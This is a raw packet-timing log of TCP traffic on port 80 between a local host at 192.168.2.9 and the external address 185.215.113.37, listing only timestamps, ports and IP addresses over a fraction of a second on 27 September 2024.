Sep 27, 2024 01:28:16.436922073 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.436922073 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.436934948 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.436947107 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.436954021 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.436975956 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.436999083 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.437067032 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437079906 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437112093 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.437113047 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437124968 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.437149048 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.437181950 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437191010 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437197924 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437207937 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437215090 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437227011 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.437227964 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437243938 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437257051 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437258959 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.437268019 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.437271118 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437299013 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.437329054 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.437839985 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437851906 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437861919 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437874079 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437885046 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437891006 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.437896013 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437906027 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.437907934 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437921047 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437932014 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.437933922 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437947989 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437953949 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.437959909 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437972069 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437978029 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.437984943 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.437994957 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438005924 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438008070 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438019991 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438029051 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438033104 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438065052 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438079119 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438206911 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438219070 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438229084 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438240051 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438251019 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438255072 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438270092 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438281059 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438282013 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438294888 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438297033 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438308001 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438321114 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438332081 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438333988 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438344002 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438353062 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438358068 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438369989 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438371897 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438381910 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438383102 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438396931 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438405991 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438415051 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438416004 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438431025 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438441038 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438443899 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438452959 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438457966 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438466072 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438477993 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438487053 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438488960 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438502073 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.438513994 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438525915 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.438555002 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.469978094 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.469993114 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.470010996 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.470022917 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.470035076 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.470066071 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.470094919 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.470097065 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.470109940 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.470110893 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.470123053 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.470143080 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.470154047 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.470155954 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.470170975 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.470200062 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.470242023 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.470254898 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.470278978 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.470280886 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.470292091 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.470297098 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.470308065 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.470316887 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.470340014 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.470365047 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.498240948 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498266935 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498279095 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498331070 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498342037 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498354912 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498367071 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.498394966 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498406887 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498420000 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.498441935 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.498481035 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498493910 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498528004 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.498567104 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498579979 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498590946 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498603106 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498610973 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.498621941 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498647928 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.498675108 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.498692036 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498703957 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498714924 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498725891 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498735905 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.498739958 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498761892 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.498776913 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.498851061 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498862028 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498872995 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498893976 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.498912096 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.498939037 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498950958 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498963118 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498972893 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.498975992 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.498990059 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.499001026 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.499039888 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.519529104 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.519552946 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.519617081 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.519742966 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.519761086 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.519772053 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.519785881 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.519798040 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.519798994 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.519810915 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.519836903 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.519861937 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.521538019 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.521550894 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.521563053 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.521586895 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.521604061 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.521661043 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.521672964 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.521692038 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.521698952 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.521704912 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.521732092 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.521754980 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.522037983 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.522087097 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.522109985 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.522121906 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.522156000 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.522237062 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.522249937 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.522260904 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.522274017 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.522531033 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.523066998 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.523080111 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.523091078 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.523097992 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.523114920 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.523140907 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.523366928 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.523380041 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.523397923 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.523407936 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.523420095 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.523437023 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.523461103 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.523845911 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.523857117 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.523868084 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.523893118 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.523911953 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.523921013 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.523926020 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.523937941 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.523950100 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.523953915 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.523969889 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.523983955 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.524068117 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524080038 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524091005 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524102926 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524111032 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.524116039 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524123907 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.524131060 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524142981 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524153948 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.524154902 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524168968 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524175882 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.524194002 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524204016 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.524236917 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.524636984 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524647951 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524661064 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524686098 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.524686098 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.524703979 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524708033 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.524715900 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524728060 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524740934 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524745941 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.524756908 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.524780035 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.524813890 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524825096 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524837017 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524848938 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.524852037 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.524913073 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.525033951 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.525046110 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.525062084 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.525077105 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.525082111 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.525082111 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.525095940 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.525096893 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.525110960 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.525121927 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.525127888 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.525132895 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.525151968 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.525154114 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.525166035 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.525177002 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.525187969 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.525192976 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.525204897 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.525222063 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.525262117 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.558626890 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.558650017 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.558661938 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.558715105 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.558739901 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.558743000 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.558753014 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.558764935 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.558783054 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.558783054 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.558795929 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.558808088 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.558810949 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.558820009 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.558840036 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.558856010 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.558866024 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.558867931 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.558893919 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.558897972 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.558912992 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.558922052 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.558923960 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.558940887 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.558971882 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.586180925 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586200953 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586218119 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586230993 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586241961 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586262941 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586260080 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.586276054 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586299896 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.586330891 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.586519957 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586533070 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586544037 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586568117 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.586584091 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.586622953 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586633921 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586646080 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586656094 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586667061 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586667061 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.586678028 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.586692095 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586715937 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.586743116 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.586776018 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586786985 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586797953 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586818933 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.586834908 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.586858034 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.586869955 CEST	80	49706	185.215.113.37	192.168.2.9
